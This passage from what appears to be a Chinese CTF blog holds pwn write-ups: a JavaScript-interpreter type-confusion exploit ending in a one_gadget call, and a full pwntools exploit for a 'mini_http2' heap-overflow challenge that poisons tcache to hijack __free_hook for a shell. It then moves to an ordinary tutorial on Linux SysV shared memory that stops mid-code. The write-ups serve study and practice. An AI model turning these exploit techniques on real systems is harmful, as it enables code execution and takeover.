        if (self->type != JS_CDATE)
                js_typeerror(J, "not a date");
        self->u.number = TimeClip(t);
        js_pushnumber(J, self->u.number);
}

static void Dp_setTime(js_State *J)
{
        js_setdate(J, 0, js_tonumber(J, 1));
}

函数 setTime 可以修改 js_Object.u.number，因此我们修改 dataview 为 date，执行完 setTime 后再改回来：

b.setUint8(0x48+8, 10); // set c type to Date
Date.prototype.setTime.bind(c)(1.09522e+12) // write number + length
/* c.setTime(0) */
b.setUint8(0x48+8, 16); // set c type back to DataView
print(c.getLength())

这里不能直接使用 c.setTime(0)，对象的 prototype 在我们一创建的时候其实就已经确定了,所以当我们改变 type 的时候 prototype 并没有改变
而 prototype 基本就已经定义了这个对象可以调用哪些方法

pwndbg> telescope 0x5555555c2b40
00:0000│  0x5555555c2b40 ◂— 0x0
01:0008│  0x5555555c2b48 ◂— 0x71 /* 'q' */
02:0010│  0x5555555c2b50 ◂— 0x10000000a /* type:date */
03:0018│  0x5555555c2b58 —▸ 0x55555559b0a0 —▸ 0x555555585089 ◂— 0x6d6172676f727000
04:0020│  0x5555555c2b60 ◂— 0x0
05:0028│  0x5555555c2b68 —▸ 0x5555555a5780 ◂— 0x100000010
06:0030│  0x5555555c2b70 ◂— 0x426fe0065ea00000 /* length */
07:0038│  0x5555555c2b78 —▸ 0x5555555c2bc0 ◂— 0x0

这之后就可以泄露 libc_base 了
最后修改某个 dataview 的 type 为 JS_CCFUNCTION（enum-4），在 js_call 可以调用函数指针 obj->u.c.function：

void js_call(js_State *J, int n)
{
	js_Object *obj;
	int savebot;

    ......
        
	} else if (obj->type == JS_CCFUNCTION) {
		jsR_pushtrace(J, obj->u.c.name, "native", 0);
		jsR_callcfunction(J, n, obj->u.c.length, obj->u.c.function);
		--J->tracetop;
	}

	BOT = savebot;
}

覆盖这里为 one_gadget 就可以了

完整 exp：

b = DataView(0x68);
a = DataView(0x48);
b = DataView(0x48);
c = DataView(0x48);
e = DataView(0x48);
f = DataView(0x1000 * 0x1000);

b.setUint8(0x48+8, 10); // set c type to Date
Date.prototype.setTime.bind(c)(1.09522e+12) // write number + length
b.setUint8(0x48+8, 16); // set c type back to DataView
print(c.getLength())

sh32 = 4294967296 // 1<<32
libb_addr_off = 472
libc_leak = c.getUint32(libb_addr_off) + (c.getUint32(libb_addr_off+4)*sh32)

libc_off = 0x7ffff7c31000 - 0x7ffff6bfe010 // got this from gdb
libc_base = libc_leak + libc_off
print('libc base:', libc_base.toString(16))

one_gag = libc_base + 0xe6af4
print('onegadget:', one_gag.toString(16))

e_obj_off = 192
c.setUint8(160, 4) // this sets type to JS_CCFUNCTION

// set lower 4 bytes of js_CFunction function
c.setUint32(e_obj_off+8, one_gag&0xffffffff) 

// set upper 4 bytes of js_CFunction function
c.setUint32(e_obj_off+8+4, Math.floor(one_gag/sh32)&0xffffffff) 
e() // e is now a function so we can call it

小结：

这应该是我复现的第一个 JavaScript 解释器（拖了好久了），第一次接触这种题目时，发现堆风水根本看不懂，于是放着了…

后来我在各个可能会申请内存的函数中打上断点，调试了一会网上的 wp 才弄清楚了一点堆风水，感觉这种题目还是没法完全掌握 heap 的分配情况（尤其是没有符号，大大增加了调试和逆向的难度），所以探索 heap 排布就只能靠尝试（目前太菜了，没有什么好方法）

最后学到了一个类型混淆的利用技术，感觉也是比较套路化的，只要把堆风水搞好就问题不大

堆溢出+Tcache Attack

Posted on 2022-09-30 Edited on 2022-12-19 In Pwn train 14k 13 mins.

mini_http2

1	GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.1) stable release version 2.35

pwn: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /home/yhellow/tools/glibc-all-in-one/libs/2.35-0ubuntu3.1_amd64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=f44285458d02382631cf8f9747971f71a6b36211, stripped
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

64位，全开

程序逻辑

在以下调用链中可以泄露 libc_base：

1	main -> pwn -> protocol_fun -> ops -> login_fun -> snprintf

1	snprintf(v8, 0x1000uLL, "{'msg': 'login successful!','status': 1,'gift': \"%p\"}", &strstr);// 泄露libc

PS：函数名称都是我自定义的，凑合看吧

根据程序逻辑，在执行 login_fun 前，必须先执行 register_fun，调用链如下：

1	main -> pwn -> protocol_fun -> ops -> register_fun

这两个函数都依靠一个字符串 protocol（包括 url）来运行对应的逻辑，里面有许多检查

register_fun：

name = strstr(a1, "username=");
pwd = strstr(a1, "password=");
if ( !name || !pwd ) /* protocol中必须要有username和password */
	output("Invalid argv");
name_last = strchr(name, '&'); 
if ( !name_last ) /* 用于计算name的长度 */
	name_last = &name[strlen(name)];
pwd_last = strchr(pwd, '&');
if ( !pwd_last ) /* 用于计算pwd的长度 */
	pwd_last = &pwd[strlen(pwd)];
name_chunk = malloc(name_last - name - 1);
memset(name_chunk, 0, name_last - name - 1);
memcpy(name_chunk, name + 9, name_last - name - 9);
pwd_chunk = malloc(pwd_last - pwd - 1);
memset(pwd_chunk, 0, pwd_last - pwd - 1);
memcpy(pwd_chunk, pwd + 9, pwd_last - pwd - 9);
if ( name_st )
    free(name_st);
if ( pwd_st )
    free(pwd_st);
name_st = (char *)name_chunk; /* 把name_chunk放入全局变量name_st */
pwd_st = (char *)pwd_chunk; /* 把pwd_chunk放入全局变量pwd_st */

login_fun：

name = strstr(a1, "username=");
pwd = strstr(a1, "password=");
if ( !login_key )
{
    if ( !name || !pwd ) /* protocol中必须要有username和password */
        output("Invalid argv");
    name_last = strchr(name, '&');
    if ( !name_last ) /* 用于计算name的长度 */
        name_last = &name[strlen(name)];
    pwd_last = strchr(pwd, '&');
    if ( !pwd_last ) /* 用于计算pwd的长度 */
        pwd_last = &pwd[strlen(pwd)];
    name_chunk = malloc(name_last - name - 1);
    memset(name_chunk, 0, name_last - name - 1);
    memcpy(name_chunk, name + 9, name_last - name - 9);
    pwd_chunk = (char *)malloc(pwd_last - pwd - 1);
    memset(pwd_chunk, 0, pwd_last - pwd - 1);
    memcpy(pwd_chunk, pwd + 9, pwd_last - pwd - 9);
    if ( !strcmp(name_st, (const char *)name_chunk) && !strcmp(pwd_st, pwd_chunk))
        /* 对比全局变量name_st/pwd_st和当前获取的name_chunk/pwd_chunk(结果无所谓) */
        login_key = 1;
    free(name_chunk);
    free(pwd_chunk);
    memset(v8, 0, 0x1000uLL);
    snprintf(v8, 0x1000uLL, "{'msg': 'login successful!','status': 1,'gift': \"%p\"}", &strstr); /* 泄露libc */
}

泄露的脚本如下：

def login():
    size_protocol = "\x00" + "\x00" + "\x27"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)

    size_url = "\x00" + "\x00" + "\x00" + "\x20"
    ops_cmd = "/login?"
    name = "username=" + "123"
    pwd = "&password=" + "123"
    url = ops_cmd + name + pwd
    protocol = "\x82" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

def register():
    size_protocol = "\x00" + "\x00" + "\x2a"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)
 
    size_url = "\x00" + "\x00" + "\x00" + "\x23"
    ops_cmd = "/register?"
    name = "username=" + "123"
    pwd = "&password=" + "123"
    url = ops_cmd + name + pwd
    protocol = "\x82" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

register()
login()
p.recvuntil("gift': \"")
leak_addr = eval(p.recvuntil("\"")[:-1])
libc_base = leak_addr - 0xc4200

success("leak_addr >> " + hex(leak_addr))
success("libc_base >> " + hex(libc_base))

另外，程序还提供了许多操作堆的函数：

void __fastcall api(char *url, char *strs)
{
    if ( !strcmp(url, "/api/add_worker") )
    {
        add_worker(url, strs);
    }
    else if ( !strcmp(url, "/api/del_worker") )
    {
        del_worker(url, strs);
    }
    else if ( !strcmp(url, "/api/show_worker") )
    {
        show_worker(url, strs);
    }
    else if ( !strcmp(url, "/api/edit_worker") )
    {
        edit_worker(url, strs);
    }
}

漏洞分析

len_name = strlen(name[4]);
memcpy(list[worker_num].name_addr_list, name[4], len_name); /* 堆溢出 */
name_addr_list = list[worker_num].name_addr_list;
name_addr_list[strlen(name[4])] = 0;
list[worker_num].name_len_list = strlen(name[4]);
len_desc = strlen(desc[4]);
memcpy(list[worker_num].desc_addr_list, desc[4], len_desc); /* 堆溢出 */
desc_addr_list = list[worker_num].desc_addr_list;
desc_addr_list[strlen(desc[4])] = 0;
list[worker_num].desc_len_list = strlen(desc[4]);

在 edit_worker 中有堆溢出

void __noreturn exit_s()
{
  if ( *function )
  {
    if ( name_st )
      ((void (__fastcall *)(char *))*function)(name_st);
  }
  puts("goodbye!");
  exit(0);
}

在 exit_s 中会执行一个函数指针，其实它就是 free_hook

1 2	pwndbg> telescope 0x55dc824e1000+0xD0A0 00:0000│ 0x55dc824ee0a0 —▸ 0x7f1130a994a8 (__free_hook) —▸ 0x7f11308c9d60 (system) ◂— endbr64

在 libc-2.34 版本中删除了 free_hook malloc_hook realloc_hook 这些符号
在 libc-2.35 版本中恢复了这些符号，但是在 free malloc realloc 中不会调用它们

但本题目提供了一个函数指针来调用 free_hook，因此传统的 free_hook 劫持是可行的

入侵思路

有堆溢出，已经泄露的 libc_base 和 heap_base

最简单的方法就是 tcache attack（因为已知 heap_base 可以伪造 key）

我的第一个思路比较简单：

add_worker("a"*0xa0,"a"*0xa0) # chunk0(用于泄露heap_base)
add_worker(p32(0x11111111),p32(0x11111111)) # chunk1
add_worker(p32(0x22222222),p32(0x22222222)) # chunk2
add_worker(p32(0x33333333),p32(0x33333333)) # chunk3
del_worker(1)
edit_worker(0,p32(0x22222222),payload)

释放 chunk2
修改 chunk1，利用堆溢出修改 chunk2->fd

但上述操作在实现的过程中会覆盖一些程序申请的 chunk，而导致报错，所以我们需要利用堆风水让可以溢出的 chunk_target 和已经释放的 chunk_free 相邻

经多次尝试，程序的分配逻辑如下：

先申请4个chunk，然后顺序释放前2个chunk
用如下测试案例可以得出结果：

1
2
3

add_worker("a"*0xa0,"a"*0xa0)
add_worker("b"*0xa0,"b"*0xa0)
add_worker("c"*0xa0,"c"*0xa0)

0xb0 [  4]: 0x55a9811028e0 —▸ 0x55a981102830 —▸ 0x55a981102660 —▸ 0x55a981102780 ◂— 0x0 
0xb0 [  2]: 0x559a4cbd5830 —▸ 0x559a4cbd58e0 ◂— 0x0 
0xb0 [  2]: 0x55a31a9108e0 —▸ 0x55a31a910830 ◂— 0x0
0xb0 [  2]: 0x5557bbb0f830 —▸ 0x5557bbb0f8e0 ◂— 0x0

依照这个逻辑，我们可以先检查一下 8d0 820 650 770 附近的堆风水：

Free chunk (tcache) | PREV_INUSE
Addr: 0x55916ba96770 /* chunk0:desc */
Size: 0xb1
fd: 0x55916ba96

Free chunk (tcache) | PREV_INUSE
Addr: 0x55916ba96820 /* 不会被申请 */
Size: 0xb1
fd: 0x559432bfdcf6

Free chunk (tcache) | PREV_INUSE
Addr: 0x55916ba968d0 /* 不会被申请 */
Size: 0xb1
fd: 0x559432bfd2a6

发现3个连续的同大小的 chunk，很适合用来溢出
攻击测试案例如下：

add_worker("a"*0xa0,"a"*0xa0) # 用于获取heap_base

add_worker(p32(0x11111111),p32(0x11111111))
add_worker(p32(0x11111111),p32(0x11111111))
add_worker(p32(0x11111111),p32(0x11111111))
add_worker(p32(0x11111111),p32(0x11111111))

add_worker("a"*0xa0,"a"*0xa0)
del_worker(0) # 用于产生3个连续且相同的free chunk
add_worker("a"*0xa0,"a"*0xa0) # 申请4个chunk,释放2个chunk
target_addr = ((heap_base + 0x10) >> 12) ^ (free_hook - 0xa8)
payload = 'B' * 0xb0 + p64(target_addr)[:6]
edit_worker(0,p32(0x11111111),payload)

tcachebins
0x20 [  5]: 0x55bd79c24ec0 —▸ 0x55bd79c250a0 —▸ 0x55bd79c24ee0 —▸ 0x55bd79c25030 —▸ 0x55bd79c24c40 ◂— 0x0
0x50 [  4]: 0x55bd79c24710 —▸ 0x55bd79c25050 —▸ 0x55bd79c24e20 —▸ 0x55bd79c24e70 ◂— 0x0
0xb0 [  2]: 0x55bd79c24830 —▸ 0x7f282fcac400 (__timer_compat_list+1984) ◂— 0x7f282fcac
0xc0 [  1]: 0x55bd79c250c0 ◂— 0x0
0x100 [  1]: 0x55bd79c24f30 ◂— 0x0
0x170 [  1]: 0x55bd79c24430 ◂— 0x0

成功把 target 放入 tcachebins 中，但是这里并不能直接把 target 取出放入 list（前两个 chunk 会被顺序释放，并且它们不会被放入 list）
解决的的办法很简单，使用 del_worker 释放掉两个 chunk 就可以了

del_worker(5)
add_worker("d"*0xa0,"d"*0xa0)
payload = 'c'*0xA8 + p64(system_libc)[:6]
edit_worker(5,p32(0x11111111),payload) # 已经成功劫持free_hook

tcachebins
0x20 [  3]: 0x55ac097510a0 —▸ 0x55ac09751030 —▸ 0x55ac09750c40 ◂— 0x0
0x30 [  1]: 0x55ac097511b0 ◂— 0x0
0x50 [  2]: 0x55ac09750e20 —▸ 0x55ac09750e70 ◂— 0x0
0xb0 [  4]: 0x55ac09750d10 —▸ 0x55ac09750c60 —▸ 0x55ac09750830 —▸ 0x7fefc0c74400 (__timer_compat_list+1984) ◂— 0x7fefc0c74
0xc0 [  1]: 0x55ac097510c0 ◂— 0x0
0x100 [  1]: 0x55ac09750f30 ◂— 0x0
0x170 [  1]: 0x55ac09750430 ◂— 0x0

最后执行一下 exit_s 就可以了

完整 exp：

# -*- coding: utf-8 -*-s
from pwn import *
import json

p = process("./pwn")

elf = ELF("./pwn")
libc = ELF("./libc.so.6")

d = "b*$rebase(0x6B6C)\n"
#gdb.attach(p,d)

def login():
    size_protocol = "\x00" + "\x00" + "\x27"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)

    size_url = "\x00" + "\x00" + "\x00" + "\x20"
    ops_cmd = "/login?"
    name = "username=" + "111"
    pwd = "&password=" + "222"
    url = ops_cmd + name + pwd
    protocol = "\x82" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

def register():
    size_protocol = "\x00" + "\x00" + "\x2e"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)
 
    size_url = "\x00" + "\x00" + "\x00" + "\x27"
    ops_cmd = "/register?"
    name = "username=" + "/bin/sh"
    pwd = "&password=" + "444"
    url = ops_cmd + name + pwd
    protocol = "\x82" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

def exit():
    size_protocol = "\x00" + "\x00" + "\x0c"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)

    size_url = "\x00" + "\x00" + "\x00" + "\x05"
    ops_cmd = "/exit"
    url = ops_cmd 
    protocol = "\x82" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

def add_worker(name,desc):
    size_protocol = "\x00" + "\x00" + "\x16"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)

    size_url = "\x00" + "\x00" + "\x00" + "\x0f"
    url = "/api/add_worker"
    protocol = "\x83" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

    strs = '{"name": "' + name + '","desc": "' + desc + '"}'
    size_strs = "\x00" + p16(len(strs))[::-1]
    cmd2 = size_strs + "\x00"
    cmd2 = cmd2.ljust(9,"\x00")
    p.send(cmd2)
    p.send(strs)

def del_worker(index):
    size_protocol = "\x00" + "\x00" + "\x16"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)

    size_url = "\x00" + "\x00" + "\x00" + "\x0f"
    url = "/api/del_worker"
    protocol = "\x83" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

    strs = {
        'worker_idx':index,
    }
    size_strs = "\x00" + p16(len(json.dumps(strs)))[::-1]
    cmd2 = size_strs + "\x00"
    cmd2 = cmd2.ljust(9,"\x00")
    p.send(cmd2)
    p.send(json.dumps(strs))

def show_worker(index):
    size_protocol = "\x00" + "\x00" + "\x17"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)

    size_url = "\x00" + "\x00" + "\x00" + "\x10"
    url = "/api/show_worker"
    protocol = "\x83" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

    strs = {
        'worker_idx':index,
    }
    size_strs = "\x00" + p16(len(json.dumps(strs)))[::-1]
    cmd2 = size_strs + "\x00"
    cmd2 = cmd2.ljust(9,"\x00")
    p.send(cmd2)
    p.send(json.dumps(strs))

def edit_worker(index,name,desc):
    size_protocol = "\x00" + "\x00" + "\x17"
    cmd = size_protocol + "\x01" + "\x05" 
    cmd = cmd.ljust(9,"\x00")
    p.send(cmd)

    size_url = "\x00" + "\x00" + "\x00" + "\x10"
    url = "/api/edit_worker"
    protocol = "\x83" + "\x86" + "\x44" + size_url + url
    print(hex(len(protocol)))
    print(hex(len(url)))
    p.send(protocol)

    strs = '{"worker_idx": ' + str(index) + ',"name": "' + name + '","desc": "' + desc + '"}'
    size_strs = "\x00" + p16(len(strs))[::-1]
    cmd2 = size_strs + "\x00"
    cmd2 = cmd2.ljust(9,"\x00")
    p.send(cmd2)
    p.send(strs)

register()
login()
p.recvuntil("gift': \"")
leak_addr = eval(p.recvuntil("\"")[:-1])
libc_base = leak_addr - 0xc4200
system_libc = libc_base + libc.sym["system"]
free_hook = libc_base + libc.sym["__free_hook"]

success("leak_addr >> " + hex(leak_addr))
success("libc_base >> " + hex(libc_base))
success("system_libc >> " + hex(system_libc))
success("free_hook >> " + hex(free_hook))

add_worker("a"*0xa0,"a"*0xa0)

p.recvuntil("name_addr\": \"")
leak_addr = eval(p.recvuntil("\"")[:-1])
heap_base = leak_addr - 0x600
success("leak_addr >> " + hex(leak_addr))
success("heap_base >> " + hex(heap_base))

add_worker(p32(0x11111111),p32(0x11111111))
add_worker(p32(0x11111111),p32(0x11111111))
add_worker(p32(0x11111111),p32(0x11111111))
add_worker(p32(0x11111111),p32(0x11111111))

add_worker("a"*0xa0,"a"*0xa0)
del_worker(0)
add_worker("a"*0xa0,"a"*0xa0)
target_addr = ((heap_base + 0x10) >> 12) ^ (free_hook - 0xa8)
payload = 'b'*0xb0 + p64(target_addr)[:6]
edit_worker(0,p32(0x11111111),payload)
del_worker(5)
add_worker("d"*0xa0,"d"*0xa0)
payload = 'c'*0xA8 + p64(system_libc)[:6]
edit_worker(5,p32(0x11111111),payload)

exit()

p.interactive()

小结：

这个题目主要就是逆向，打比赛的时候摆烂没有做出来，之后的复现还是比较轻松的

我的思路和官方wp还有些不一样，当时我看见3个连续的 free chunk 时就直接开始考虑溢出的事情了，现在想来官方wp对于堆风水的处理还有些冗余

最好不要跨 chunk 进行溢出，我的第一个思路就需要跨 chunk，为了解决程序报错的问题，需要先找到报错的原因，然后进行对应的伪造，最后因为 payload 过长而不得不放弃
以后遇到类似的，还是要先搞清楚堆分配的规律（可以逆向，也可以直接试），然后再想办法制造相邻 chunk，以便进行溢出

Principles：共享内存shm底层原理

Posted on 2022-09-22 Edited on 2022-11-16 In Principles 23k 21 mins.

共享内存基础知识

共享内存有两个，一个 mmap，一个 systemV 的 shm

由于所有用户进程总的虚拟地址空间比可用的物理内存大很多，因此只有最常用的部分才与物理页帧关联（这不是问题，因为大多数程序只占用实际可用内存的一小部分）

在将磁盘上的数据映射到进程的虚拟地址空间的时，内核必须提供数据结构，以建立虚拟地址空间的区域和相关数据所在位置之间的关联，Linux 软件系统多级页表映射机制
共享内存使得多个进程可以访问同一块内存空间（节约了内存空间），不同进程可以及时看到对方进程中对共享内存中数据得更新（多个进程可以同时操作，所以需要进行同步，一般与信号量配合使用）

本文主要介绍 shm

共享内存的 API

1	int shmget(key_t key, size_t size, int shmflg); /* 获取一个新的共享内存段 */

key：
- IPC_PRIVATE - “0”：会建立新共享内存对象
- 大于0的32位整数：视参数 shmflg 来确定操作（通常要求此值来源于 ftok 返回的IPC键值）
size：
- “0”：获取共享内存时指定为“0”
- 大于0的整数：新建的共享内存大小，以字节为单位
shmflg：
- “0”：取共享内存标识符，若不存在则函数会报错
- IPC_CREAT：如果内核中不存在键值与key相等的共享内存，则新建一个共享内存，如果存在这样的共享内存，返回此共享内存的标识符
- IPC_CREAT | IPC_EXCL：如果内核中不存在键值与 key 相等的共享内存，则新建一个共享内存，如果存在这样的共享内存则报错
return：
- 成功：返回消息队列的标识符
- 出错：返回 “-1”，错误原因存于 error 中

1	void shmat(int shmid, const void shmaddr, int shmflg); /* 进行内存映射 */

shmid：
- 共享内存的标识符
shmaddr：
- 如果 shmaddr 为“0”则此段连接到由内核选择的第一个可用地址上
- 如果 shmaddr 非零，并且没有指定 SHM_RND，则此段链接到 shmaddr 所指的地址上，但是 shmaddr 必须是发生附加的页对齐地址
- 如果 shmaddr 非零且指定 SHM_RND，系统会自动对 shmaddr 进行页对齐
shmflg：
- “0”：读写模式
- SHM_RDONLY：为只读模式
- SHM_EXEC：指定对共享内存段的执行权限（对共享内存而言，所谓的执行权限实际上和读权限是一样的）
- SHM_RND：取整，取向下一个 SHMLBA 边界（shmaddr 非空时有效）
- SHM_REMAP：附加上的接管区域
return：
- 成功：返回共享内存地址
- 出错：返回 “-1”，错误原因存于 error 中
PS：
- fork 后子进程继承已连接的共享内存地址
- exec 后该子进程与已连接的共享内存地址自动脱离(detach)
- 目标进程结束后，已连接的共享内存地址会自动脱离(detach)

1	int shmdt(const void shmaddr); / 删除内存映射 */

shmaddr：
- 连接的共享内存的起始地址
return：
- 成功：返回消息队列的标识符
- 出错：返回 “-1”，错误原因存于 error 中

1	int shmctl(int shmid, int cmd, struct shmid_ds buf); / 对共享内存段进行操作 */

msqid：
- 共享内存的标识符
cmd：
- IPC_STAT：得到共享内存的状态，把共享内存的 shmid_ds 结构复制到 buf 中
- IPC_SET：改变共享内存的状态，把 buf 所指的 shmid_ds 结构中的 uid、gid、mode 复制到共享内存的 shmid_ds 结构内
- IPC_RMID：删除这片共享内存（销毁 shmget 创建的 shmid）
buf：
- 共享内存管理结构体
return：
- 成功：返回 “0”
- 出错：返回 “-1”，错误原因存于 error 中

共享内存使用案例

shm 写内存：

#include <stdio.h>
#include <sys/shm.h>
#include <unistd.h>
#include <string.h>

int main(int argc, char **argv) {
    int shmid;
    int i = 0;
    char *pshm;
    char buf[1024];
    key_t key = ftok(".",'z');

    printf("key = 0x%x\n",key);
    shmid = shmget(key, 1024 * 10, 0666 | IPC_CREAT);
    pshm = shmat(shmid, 0, 0);

    printf("input node 0-9\n");
    scanf("%d", &i);
    printf("node is %d\n", i);

    memset(buf, 0, sizeof(buf));
    printf("input data\n");
    scanf("%s", buf);
    memcpy(pshm + i * 1024, buf, 1024);
    shmdt(pshm);
    return 0;
}

shm 读内存：

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/shm.h>

int main(int argc, char **argv) {
    int i;
    char *pshm;
    char buf[1024];
    int shmid;
    key_t key = ftok(".",'z');
    
    printf("key = 0x%x\n",key);
    shmid = shmget(key, 1024 * 10, 0666 | IPC_CREAT);
    pshm = shmat(shmid, 0, 0);

    printf("input node 0-9\n");
    scanf("%d", &i);
    printf("node is %d\n",i);

    memset(buf, 0, 1024);
    memcpy(buf, pshm + i * 1024, 1024);
    fprintf(stderr,"data [%s]\n", buf);
    shmdt(pshm);
    return 0;
}

效果：（这里把 R/W 分为两个文件，体现其通信的特性）

➜  exp ./send
key = 0x7a05274f
input node 0-9
0
node is 0
input data
yhellow

➜  exp ./read
key = 0x7a05274f
input node 0-9
0
node is 0
data [yhellow]

表面和 msg 的效果很像：
- “共享内存段-shmid_kernel” 类似于 “消息队列-msg_queue”
- “映射的内存-shm_file_data” 类似于 “消息-msg_msg”
- 但是
只是多了片虚拟内存空间：

    0x7ffff7fb0000     0x7ffff7fb6000 rw-p     6000 0      [anon_7ffff7fb0]
    0x7ffff7fc6000     0x7ffff7fc9000 rw-p     3000 0      /SYSV7a05274f (deleted)
    0x7ffff7fc9000     0x7ffff7fcd000 r--p     4000 0      [vvar]
    0x7ffff7fcd000     0x7ffff7fcf000 r-xp     2000 0      [vdso]
pwndbg> telescope 0x7ffff7fc6000
00:0000│  0x7ffff7fc6000 ◂— 0x776f6c6c656879 /* 'yhellow' */
01:0008│  0x7ffff7fc6008 ◂— 0x0

shm 父子进程通信：

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFFER_SIZE 2048

int main()
{
	pid_t pid;
	int shmid;
	char *shm_addr;
	char flag[] = "WROTE";
	char buff[2048];
	
	system("ipcs -m");
	if ((shmid = shmget(IPC_PRIVATE, BUFFER_SIZE, 0666)) < 0){
		perror("shmget");
		exit(1);
	}
	else{
		printf("Create shared-memory: %d\n",shmid);
	}
	system("ipcs -m");
	
	pid = fork();
	if (pid == -1){
		perror("fork");
		exit(1);
	}
	else if (pid == 0) { /* 子进程处理 */
		if ((shm_addr = shmat(shmid, 0, 0)) == (void*)-1){
			perror("Child: shmat");
			exit(1);
		}
		else{
			printf("Child: Attach shared-memory addr: %p\n", shm_addr);
		}
		system("ipcs -m");
		
		while (strncmp(shm_addr, flag, strlen(flag))){
			printf("Child: Wait for enable data...\n");
			sleep(5);
		}

		strcpy(buff, shm_addr + strlen(flag));
		printf("Child: Shared-memory :%s\n", buff);

		if ((shmdt(shm_addr)) < 0){
			perror("shmdt");
			exit(1);
		}
		else{
			printf("Child: Deattach shared-memory\n");
		}
	  	system("ipcs -m");
	  	
	  	if (shmctl(shmid, IPC_RMID, NULL) == -1){
			perror("Child: shmctl(IPC_RMID)\n");
			exit(1);
		}
		else{
			printf("Delete shared-memory\n");
		}
		system("ipcs -m");
	}
	else { /* 父进程处理 */
		sleep(1);
		if ((shm_addr = shmat(shmid, 0, 0)) == (void*)-1){
			perror("Parent: shmat");
			exit(1);
		}
		else{
			printf("Parent: Attach shared-memory addr: %p\n", shm_addr);
		}
		
		printf("\nInput some string:(Parent)\n");
		fgets(buff, BUFFER_SIZE, stdin);
		strncpy(shm_addr + strlen(flag), buff, strlen(buff));
		strncpy(shm_addr, flag, strlen(flag));
		system("ipcs -m");

		if ((shmdt(shm_addr)) < 0){
			perror("Parent: shmdt");
			exit(1);
		}
		else{
			printf("Parent: Deattach shared-memory\n");
		}
		system("ipcs -m");
		
		waitpid(pid, NULL, 0);		
		printf("Finished\n");
	}
  	exit(0);
}

效果：

➜  exp ./shmem

------------ 共享内存段 -------------- /* 初始状态 */
键        shmid      拥有者  权限     字节     连接数  状态      
0x00000000 4          yhellow    600        524288     2          目标       
0x00000000 7          yhellow    600        524288     2          目标       
0x00000000 11         yhellow    600        524288     2          目标       

Create shared-memory: 13

------------ 共享内存段 -------------- /* shmget新创建的共享内存段(shmid==13) */
键        shmid      拥有者  权限     字节     连接数  状态      
0x00000000 4          yhellow    600        524288     2          目标       
0x00000000 7          yhellow    600        524288     2          目标       
0x00000000 11         yhellow    600        524288     2          目标       
0x00000000 13         yhellow    666        2048       0                       

Child: Attach shared-memory addr: 0x7fe24a52d000

------------ 共享内存段 -------------- /* 子进程连接该共享内存段,使其[连接数]加一 */
键        shmid      拥有者  权限     字节     连接数  状态      
0x00000000 4          yhellow    600        524288     2          目标       
0x00000000 7          yhellow    600        524288     2          目标       
0x00000000 11         yhellow    600        524288     2          目标       
0x00000000 13         yhellow    666        2048       1                       

Child: Wait for enable data...
Parent: Attach shared-memory addr: 0x7fe24a52d000

Input some string:(Parent)
yhellow /* 在父进程上的输入 */

------------ 共享内存段 -------------- /* 父进程连接该共享内存段,使其[连接数]加一 */
键        shmid      拥有者  权限     字节     连接数  状态      
0x00000000 4          yhellow    600        524288     2          目标       
0x00000000 7          yhellow    600        524288     2          目标       
0x00000000 11         yhellow    600        524288     2          目标       
0x00000000 13         yhellow    666        2048       2                       

Parent: Deattach shared-memory

------------ 共享内存段 -------------- /* 父进程断开该共享内存段,使其[连接数]减一 */
键        shmid      拥有者  权限     字节     连接数  状态      
0x00000000 4          yhellow    600        524288     2          目标       
0x00000000 7          yhellow    600        524288     2          目标       
0x00000000 11         yhellow    600        524288     2          目标       
0x00000000 13         yhellow    666        2048       1                       

Child: Shared-memory :yhellow /* 在子进程上的输出 */

Child: Deattach shared-memory

------------ 共享内存段 -------------- /* 子进程断开该共享内存段,使其[连接数]减一 */
键        shmid      拥有者  权限     字节     连接数  状态      
0x00000000 4          yhellow    600        524288     2          目标       
0x00000000 7          yhellow    600        524288     2          目标       
0x00000000 11         yhellow    600        524288     2          目标       
0x00000000 13         yhellow    666        2048       0                       

Delete shared-memory

------------ 共享内存段 -------------- /* shmctl销毁了指定的共享内存段 */
键        shmid      拥有者  权限     字节     连接数  状态      
0x00000000 4          yhellow    600        524288     2          目标       
0x00000000 7          yhellow    600        524288     2          目标       
0x00000000 11         yhellow    600        524288     2          目标       

Finished

Linux 中 shm 的实现

► 0x7ffff7ee11fc <shmget+12>       syscall  <SYS_shmget>
       key: 0x7a05274f
       size: 0x2800
       shmflg: 0x3b6

struct ipc_ops {
	int (*getnew)(struct ipc_namespace *, struct ipc_params *);
	int (*associate)(struct kern_ipc_perm *, int);
